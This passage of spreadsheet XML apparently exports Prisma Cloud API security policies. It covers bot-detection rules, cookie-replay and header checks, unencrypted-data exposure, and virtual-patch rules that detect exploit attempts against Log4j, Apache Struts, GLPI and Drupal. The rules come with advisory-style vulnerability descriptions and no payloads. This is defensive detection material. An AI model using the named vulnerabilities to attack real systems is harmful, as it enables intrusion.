      <c r="T3425" t="b">
        <v>0</v>
      </c>
      <c r="U3425" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3425" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3425" t="inlineStr">
        <is>
          <t>This policy detects  bots that crawl, extract and index financial related data.</t>
        </is>
      </c>
      <c r="X342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5" t="inlineStr"/>
      <c r="Z3425" t="inlineStr"/>
      <c r="AA3425" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3425" t="inlineStr">
        <is>
          <t>2023-06-15 01:00:00</t>
        </is>
      </c>
      <c r="AC3425" t="inlineStr"/>
      <c r="AD3425" t="b">
        <v>1</v>
      </c>
      <c r="AE3425" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3425" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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5" t="inlineStr">
        <is>
          <t>da0a3afc-81e1-4563-a99a-9f63569c2aae</t>
        </is>
      </c>
      <c r="AI3425" t="inlineStr"/>
      <c r="AJ3425" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3425" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3426">
      <c r="A3426" t="inlineStr"/>
      <c r="B3426" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3426" s="2" t="inlineStr"/>
      <c r="D3426" t="inlineStr"/>
      <c r="E3426" t="inlineStr"/>
      <c r="F3426" t="inlineStr"/>
      <c r="G3426" t="b">
        <v>1</v>
      </c>
      <c r="H342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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3426" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3426" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2021-44228 - Apache Log4j2 &lt; 2.15.0) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3426" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3426" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3426" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3426" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3426" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3426" t="inlineStr"/>
      <c r="R3426" t="inlineStr"/>
      <c r="S3426" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3426" t="b">
        <v>0</v>
      </c>
      <c r="U3426" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3426" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3426" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.</t>
        </is>
      </c>
      <c r="X342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6" t="inlineStr"/>
      <c r="Z3426" t="inlineStr"/>
      <c r="AA3426" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3426" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3426" t="inlineStr"/>
      <c r="AD3426" t="b">
        <v>1</v>
      </c>
      <c r="AE3426" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3426" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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6" t="inlineStr">
        <is>
          <t>20c69f93-647c-4864-a8bf-cd8db6d2cb05</t>
        </is>
      </c>
      <c r="AI3426" t="inlineStr"/>
      <c r="AJ3426" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3426" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3427">
      <c r="A3427" t="inlineStr"/>
      <c r="B3427" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3427" s="2" t="inlineStr"/>
      <c r="D3427" t="inlineStr"/>
      <c r="E3427" t="inlineStr"/>
      <c r="F3427" t="inlineStr"/>
      <c r="G3427" t="b">
        <v>1</v>
      </c>
      <c r="H342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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3427" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3427" t="inlineStr">
        <is>
          <t>Web Automation Tool activity</t>
        </is>
      </c>
      <c r="L3427" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3427" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3427" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3427" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3427" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3427" t="inlineStr"/>
      <c r="R3427" t="inlineStr"/>
      <c r="S3427" t="inlineStr"/>
      <c r="T3427" t="b">
        <v>0</v>
      </c>
      <c r="U3427" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3427" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3427" t="inlineStr">
        <is>
          <t>This policy detects scriptable headless web browsers and similar web automation tools.</t>
        </is>
      </c>
      <c r="X342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7" t="inlineStr"/>
      <c r="Z3427" t="inlineStr"/>
      <c r="AA3427" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3427" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3427" t="inlineStr"/>
      <c r="AD3427" t="b">
        <v>1</v>
      </c>
      <c r="AE3427" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3427" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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7" t="inlineStr">
        <is>
          <t>112d6072-1dd9-44dc-8e83-d7366022cc2f</t>
        </is>
      </c>
      <c r="AI3427" t="inlineStr"/>
      <c r="AJ3427" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3427" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3428">
      <c r="A3428" t="inlineStr"/>
      <c r="B3428" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3428" s="2" t="inlineStr"/>
      <c r="D3428" t="inlineStr"/>
      <c r="E3428" t="inlineStr"/>
      <c r="F3428" t="inlineStr"/>
      <c r="G3428" t="b">
        <v>1</v>
      </c>
      <c r="H342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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3428" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3428" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2023-50164 - Apache Struts Directory Traversal) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3428" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3428" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3428" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3428" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3428" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3428" t="inlineStr"/>
      <c r="R3428" t="inlineStr"/>
      <c r="S3428" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3428" t="b">
        <v>0</v>
      </c>
      <c r="U3428" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3428" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3428" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits. CVE-2023-50164  is a critical directory traversal in Apache Struts. In affected versions this vulnerability may allow a remote attacker to cause a directory traversal that can be translated into remote code execution.</t>
        </is>
      </c>
      <c r="X342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8" t="inlineStr"/>
      <c r="Z3428" t="inlineStr"/>
      <c r="AA3428" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3428" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:08</t>
        </is>
      </c>
      <c r="AC3428" t="inlineStr"/>
      <c r="AD3428" t="b">
        <v>1</v>
      </c>
      <c r="AE3428" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3428" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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8" t="inlineStr">
        <is>
          <t>19a6b743-ca9c-4f82-b075-8398a6ade3a5</t>
        </is>
      </c>
      <c r="AI3428" t="inlineStr"/>
      <c r="AJ3428" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3428" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3429">
      <c r="A3429" t="inlineStr"/>
      <c r="B3429" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3429" s="2" t="inlineStr"/>
      <c r="D3429" t="inlineStr"/>
      <c r="E3429" t="inlineStr"/>
      <c r="F3429" t="inlineStr"/>
      <c r="G3429" t="b">
        <v>1</v>
      </c>
      <c r="H342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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3429" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="K3429" t="inlineStr">
        <is>
          <t>Access attempt has been detected in HTTP traffic where the HTTP header names or values do not conform to the permitted values</t>
        </is>
      </c>
      <c r="L3429" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3429" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3429" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3429" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3429" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3429" t="inlineStr"/>
      <c r="R3429" t="inlineStr"/>
      <c r="S3429" t="inlineStr"/>
      <c r="T3429" t="b">
        <v>0</v>
      </c>
      <c r="U3429" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3429" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3429" t="inlineStr">
        <is>
          <t>The policy monitors access attempts in HTTP traffic. It identifies instances where the HTTP header names or values deviate from the approved criteria and do not comply with specified standards.</t>
        </is>
      </c>
      <c r="X342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29" t="inlineStr"/>
      <c r="Z3429" t="inlineStr"/>
      <c r="AA3429" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3429" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3429" t="inlineStr"/>
      <c r="AD3429" t="b">
        <v>1</v>
      </c>
      <c r="AE3429" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3429" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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29" t="inlineStr">
        <is>
          <t>5634f2ac-5425-4b2f-8a3a-d78c08536893</t>
        </is>
      </c>
      <c r="AI3429" t="inlineStr"/>
      <c r="AJ3429" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3429" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3430">
      <c r="A3430" t="inlineStr"/>
      <c r="B3430" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3430" s="2" t="inlineStr"/>
      <c r="D3430" t="inlineStr"/>
      <c r="E3430" t="inlineStr"/>
      <c r="F3430" t="inlineStr"/>
      <c r="G3430" t="b">
        <v>1</v>
      </c>
      <c r="H34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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3430" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3430" t="inlineStr">
        <is>
          <t>Browser failed to present a valid Prisma Session Cookie</t>
        </is>
      </c>
      <c r="L3430" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3430" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3430" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3430" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3430" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3430" t="inlineStr"/>
      <c r="R3430" t="inlineStr"/>
      <c r="S3430" t="inlineStr"/>
      <c r="T3430" t="b">
        <v>0</v>
      </c>
      <c r="U3430" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3430" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3430" t="inlineStr">
        <is>
          <t>This policy mandates that browsers must present a valid Prisma Session Cookie. Its primary objective is to prevent cookie tampering or replay attempts, where a legitimate cookie is acquired from a widely used browser and then utilized in command line tools, headless browsers, or other forms of automation frameworks.</t>
        </is>
      </c>
      <c r="X343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0" t="inlineStr"/>
      <c r="Z3430" t="inlineStr"/>
      <c r="AA3430" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3430" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3430" t="inlineStr"/>
      <c r="AD3430" t="b">
        <v>1</v>
      </c>
      <c r="AE3430" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3430" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG34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0" t="inlineStr">
        <is>
          <t>2ab85adb-8dd7-424a-a2ee-4ae697668673</t>
        </is>
      </c>
      <c r="AI3430" t="inlineStr"/>
      <c r="AJ3430" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3430" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3431">
      <c r="A3431" t="inlineStr"/>
      <c r="B3431" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3431" s="2" t="inlineStr"/>
      <c r="D3431" t="inlineStr"/>
      <c r="E3431" t="inlineStr"/>
      <c r="F3431" t="inlineStr"/>
      <c r="G3431" t="b">
        <v>1</v>
      </c>
      <c r="H34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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3431" t="inlineStr">
        <is>
          <t>sensitive_data_exposure_api</t>
        </is>
      </c>
      <c r="K3431" t="inlineStr">
        <is>
          <t>Sensitive data sent via API endpoint exposed to internet without encryption</t>
        </is>
      </c>
      <c r="L3431" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M3431" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3431" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3431" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3431" t="inlineStr">
        <is>
          <t>sensitive_data_exposure</t>
        </is>
      </c>
      <c r="Q3431" t="inlineStr"/>
      <c r="R3431" t="inlineStr"/>
      <c r="S3431" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3431" t="b">
        <v>0</v>
      </c>
      <c r="U3431" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3431" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3431" t="inlineStr">
        <is>
          <t>This policy identifies the risk of sensitive data being exposed due to clear text transmission through an API endpoint that is exposed to the internet without encryption</t>
        </is>
      </c>
      <c r="X3431" t="inlineStr">
        <is>
          <t>Implement Transport Layer Security (TLS). Using HTTPS with TLS ensures that data transmitted over the API endpoint is encrypted during transit. TLS establishes a secure communication channel between the client and server, protecting the data from interception or tampering.</t>
        </is>
      </c>
      <c r="Y3431" t="inlineStr"/>
      <c r="Z3431" t="inlineStr"/>
      <c r="AA3431" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3431" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:59</t>
        </is>
      </c>
      <c r="AC3431" t="inlineStr"/>
      <c r="AD3431" t="b">
        <v>1</v>
      </c>
      <c r="AE3431" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3431" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG34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1" t="inlineStr">
        <is>
          <t>caf8e467-2fac-4a91-8ab7-bb08d77a8a4f</t>
        </is>
      </c>
      <c r="AI3431" t="inlineStr"/>
      <c r="AJ3431" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3431" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3432">
      <c r="A3432" t="inlineStr"/>
      <c r="B3432" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3432" s="2" t="inlineStr"/>
      <c r="D3432" t="inlineStr"/>
      <c r="E3432" t="inlineStr"/>
      <c r="F3432" t="inlineStr"/>
      <c r="G3432" t="b">
        <v>1</v>
      </c>
      <c r="H34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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3432" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3432" t="inlineStr">
        <is>
          <t>Bot impersonation detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3432" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3432" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3432" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3432" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3432" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3432" t="inlineStr"/>
      <c r="R3432" t="inlineStr"/>
      <c r="S3432" t="inlineStr"/>
      <c r="T3432" t="b">
        <v>0</v>
      </c>
      <c r="U3432" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3432" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3432" t="inlineStr">
        <is>
          <t>This policy detects Bot Impersonators. Bot impersonators are computer programs or tools that mimic behavior of legitimate bots, such as search engine crawlers, in order to scrape website content under the guise of indexing it.</t>
        </is>
      </c>
      <c r="X343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2" t="inlineStr"/>
      <c r="Z3432" t="inlineStr"/>
      <c r="AA3432" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3432" t="inlineStr">
        <is>
          <t>2023-08-21 05:27:15</t>
        </is>
      </c>
      <c r="AC3432" t="inlineStr"/>
      <c r="AD3432" t="b">
        <v>1</v>
      </c>
      <c r="AE3432" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3432" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG34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2" t="inlineStr">
        <is>
          <t>4a2a4835-f288-42c8-842d-39db1e3159d4</t>
        </is>
      </c>
      <c r="AI3432" t="inlineStr"/>
      <c r="AJ3432" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3432" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3433">
      <c r="A3433" t="inlineStr"/>
      <c r="B3433" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3433" s="2" t="inlineStr"/>
      <c r="D3433" t="inlineStr"/>
      <c r="E3433" t="inlineStr"/>
      <c r="F3433" t="inlineStr"/>
      <c r="G3433" t="b">
        <v>0</v>
      </c>
      <c r="H343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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3433" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3433" t="inlineStr">
        <is>
          <t>Career Search Bot activity</t>
        </is>
      </c>
      <c r="L3433" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3433" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3433" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3433" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3433" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3433" t="inlineStr"/>
      <c r="R3433" t="inlineStr"/>
      <c r="S3433" t="inlineStr"/>
      <c r="T3433" t="b">
        <v>0</v>
      </c>
      <c r="U3433" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3433" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3433" t="inlineStr">
        <is>
          <t>This policy detects automated tools or online services that extract and index job related postings.</t>
        </is>
      </c>
      <c r="X343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3" t="inlineStr"/>
      <c r="Z3433" t="inlineStr"/>
      <c r="AA3433" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3433" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3433" t="inlineStr"/>
      <c r="AD3433" t="b">
        <v>1</v>
      </c>
      <c r="AE3433" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3433" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG343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3" t="inlineStr">
        <is>
          <t>9065d5fa-410e-44af-83c4-e41c51e06978</t>
        </is>
      </c>
      <c r="AI3433" t="inlineStr"/>
      <c r="AJ3433" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3433" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3434">
      <c r="A3434" t="inlineStr"/>
      <c r="B3434" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3434" s="2" t="inlineStr"/>
      <c r="D3434" t="inlineStr"/>
      <c r="E3434" t="inlineStr"/>
      <c r="F3434" t="inlineStr"/>
      <c r="G3434" t="b">
        <v>1</v>
      </c>
      <c r="H343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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3434" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3434" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2022-35914 - GLPI Project RCE) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3434" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3434" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3434" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3434" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3434" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3434" t="inlineStr"/>
      <c r="R3434" t="inlineStr"/>
      <c r="S3434" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3434" t="b">
        <v>0</v>
      </c>
      <c r="U3434" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3434" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3434" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.</t>
        </is>
      </c>
      <c r="X343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4" t="inlineStr"/>
      <c r="Z3434" t="inlineStr"/>
      <c r="AA3434" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3434" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3434" t="inlineStr"/>
      <c r="AD3434" t="b">
        <v>1</v>
      </c>
      <c r="AE3434" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3434" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG34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4" t="inlineStr">
        <is>
          <t>13f14505-fe9a-4642-8dd3-edc409f69da6</t>
        </is>
      </c>
      <c r="AI3434" t="inlineStr"/>
      <c r="AJ3434" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3434" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3435">
      <c r="A3435" t="inlineStr"/>
      <c r="B3435" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3435" s="2" t="inlineStr"/>
      <c r="D3435" t="inlineStr"/>
      <c r="E3435" t="inlineStr"/>
      <c r="F3435" t="inlineStr"/>
      <c r="G3435" t="b">
        <v>1</v>
      </c>
      <c r="H34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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3435" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3435" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2018-7600 - Drupalgeddon2) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3435" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3435" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3435" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3435" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3435" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3435" t="inlineStr"/>
      <c r="R3435" t="inlineStr"/>
      <c r="S3435" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3435" t="b">
        <v>0</v>
      </c>
      <c r="U3435" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3435" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3435" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.</t>
        </is>
      </c>
      <c r="X343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5" t="inlineStr"/>
      <c r="Z3435" t="inlineStr"/>
      <c r="AA3435" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3435" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3435" t="inlineStr"/>
      <c r="AD3435" t="b">
        <v>1</v>
      </c>
      <c r="AE3435" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3435" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG34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5" t="inlineStr">
        <is>
          <t>5a3e2fc6-7caf-46c3-bd37-d4ff7a18f979</t>
        </is>
      </c>
      <c r="AI3435" t="inlineStr"/>
      <c r="AJ3435" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3435" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3436">
      <c r="A3436" t="inlineStr"/>
      <c r="B3436" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3436" s="2" t="inlineStr"/>
